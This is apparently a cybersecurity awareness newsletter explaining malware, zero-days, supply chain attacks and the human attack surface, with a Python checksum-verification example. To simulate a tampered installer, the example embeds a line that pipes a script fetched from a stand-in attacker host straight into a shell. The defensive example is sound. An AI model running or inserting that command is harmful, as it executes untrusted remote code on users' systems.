This quarterly newsletter summarizes the key articles I published during the first quarter of 2024. Thanks for the great responses to my cyber talks; it has been an exciting journey so far.
Malware, in simple terms, is malicious software. It is designed to get onto a victim's computer by various means, such as social engineering, visiting malicious or already compromised websites, or opening unsafe email attachments. Once on the system it executes its malicious code, also called the payload. To survive a reboot it typically changes system settings, such as registry entries (for example, the Windows Run keys that launch a program at every logon). Then the exploitation starts, with one or more possibilities such as:
· Sending sensitive information from the system to the criminal hacker (data exfiltration)
· Allowing the attacker to remotely control the system
· Enrolling your system in a botnet, which can then be used for purposes such as DDoS attacks
· Encrypting files and demanding a ransom to release them (ransomware)
Zero-day vulnerabilities are security flaws or weaknesses in software that are unknown to the vendor and the public. Why are they called zero-days? Because developers have literally "zero days" to fix the vulnerability or release a patch before it is exploited by criminal hackers. In other words, the vulnerability becomes known to attackers before it becomes known to the software or system's developer.
Zero-day vulnerabilities pose significant risks to our technology-fuelled digital world. No one can build a flawless system, and zero-days are simply the flaws that attackers find first. If everyone contributes in their best capacity to reduce the risk, the negative impact can certainly be brought down: security researchers by responsibly reporting the vulnerabilities they come across, and the general public and organizations by applying patches in a timely manner once they are available. This is how we reduce the risk of zero-days.
Criminal hackers employ various tactics to get into an organization's technology infrastructure. One of the indirect ways is the supply chain attack. The organization itself might have robust cybersecurity controls, but its suppliers, partners or other parties in the supply chain may not, so the attacker breaks into one of them and rides that trusted relationship into the target. How is it possible?
· Exploiting the weakest link in the supply chain, typically the least well-defended supplier or partner
· Injecting malware into one of the supply chain links, for example into a software component or update that the organization installs
· Exploiting known, unpatched vulnerabilities in supplier systems or software
· Introducing counterfeit hardware into the supply chain
The impact of a supply chain attack can be serious, resulting in:
· Unauthorized access to sensitive information
· Intellectual Property losses
· Service disruption
· Lost reputation and customers
· Financial loss
While the impact is worrisome, there are ways to reduce the risk of supply chain attacks as well:
· Carrying out detailed risk assessments of the supply chain
· Performing vendor security assessments
· Following security best practices such as encryption in transit and digital signatures on software releases
· Establishing a process to verify the authenticity and integrity of hardware and software before it is put into use, for example by checking a downloaded package against the checksum or signature the vendor published
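One concrete instance of the last two points, verifying that a downloaded package matches the checksum the vendor published, is shown below as an added Python example (it is not code from the original articles). It assumes the vendor publishes a sha256sum-style manifest ("hexdigest  filename" per line) and that the manifest itself was fetched over a trusted channel or had its signature checked separately; the installer bytes and the manifest are constructed inline for the example, and one copy of the installer is deliberately tampered with so the mismatch path is exercised.

```python
"""Checksum verification of downloaded software against a vendor-published manifest.

Added example, not code from the original newsletter. It assumes a sha256sum-style
manifest ("<hexdigest>  <filename>" per line) obtained over a trusted channel or
signature-verified separately; the artifacts and manifest below are constructed.
"""
import hashlib
import hmac
from typing import Dict, Tuple

# Constructed sample "downloads": the genuine installer and a tampered copy with
# an extra line an attacker slipped into a compromised distribution mirror.
GOOD_ARTIFACT = b"#!/bin/sh\necho 'installing agent v1.2.3'\n"
TAMPERED_ARTIFACT = GOOD_ARTIFACT + b"curl -s http://evil.example/x | sh\n"


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 digest of the artifact bytes."""
    return hashlib.sha256(data).hexdigest()


# Constructed stand-in for the vendor's published SHA256SUMS file. In practice
# this comes from the vendor's release page, not from the download mirror itself.
MANIFEST_TEXT = (
    "# SHA256SUMS for agent v1.2.3 (constructed for this example)\n"
    f"{sha256_hex(GOOD_ARTIFACT)}  install.sh\n"
)


def parse_manifest(text: str) -> Dict[str, str]:
    """Parse sha256sum output into {filename: lowercase hexdigest}.

    Blank lines and '#' comments are skipped; anything else that is not a
    64-hex-char digest followed by a filename is rejected rather than ignored.
    """
    entries: Dict[str, str] = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2 or len(parts[0]) != 64:
            raise ValueError(f"malformed manifest line {lineno}: {line!r}")
        digest, name = parts
        try:
            int(digest, 16)
        except ValueError:
            raise ValueError(f"non-hex digest on manifest line {lineno}") from None
        # sha256sum prefixes filenames hashed in binary mode with '*'.
        entries[name.lstrip("*")] = digest.lower()
    return entries


def verify_artifact(name: str, data: bytes, manifest: Dict[str, str]) -> Tuple[bool, str]:
    """Return (ok, reason) for one downloaded file.

    A file missing from the manifest is a failure, not a silent pass: an attacker
    who can add files to a mirror must not be able to bypass the check that way.
    """
    expected = manifest.get(name)
    if expected is None:
        return False, f"{name}: not listed in manifest, refusing to install"
    actual = sha256_hex(data)
    # Constant-time comparison; cheap insurance even though digests are public.
    if hmac.compare_digest(actual, expected):
        return True, f"{name}: checksum OK"
    return False, f"{name}: checksum MISMATCH (expected {expected[:12]}..., got {actual[:12]}...)"


def main() -> None:
    manifest = parse_manifest(MANIFEST_TEXT)
    for label, data in (("genuine", GOOD_ARTIFACT), ("tampered", TAMPERED_ARTIFACT)):
        ok, reason = verify_artifact("install.sh", data, manifest)
        print(f"{label:9s} -> {'PASS' if ok else 'FAIL'}: {reason}")
    print(verify_artifact("extra.sh", GOOD_ARTIFACT, manifest)[1])


if __name__ == "__main__":
    main()
```

A checksum only proves that the download matches what the manifest says. If the attacker controls the server that publishes the manifest as well, the manifest itself must be protected by a digital signature from the vendor (the "digital signatures" point above); this example treats that signature check as already done.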
Can users themselves be an attack surface in cyber attacks? Very much so. While you and I are not part of a computer system, the channels through which we interact with systems create an extended attack surface that cybercriminals can target. What are those channels?
· Phishing Attacks
· Weak Passwords
· Social Engineering
· Malware and Ransomware
· Unpatched systems
· Removable Media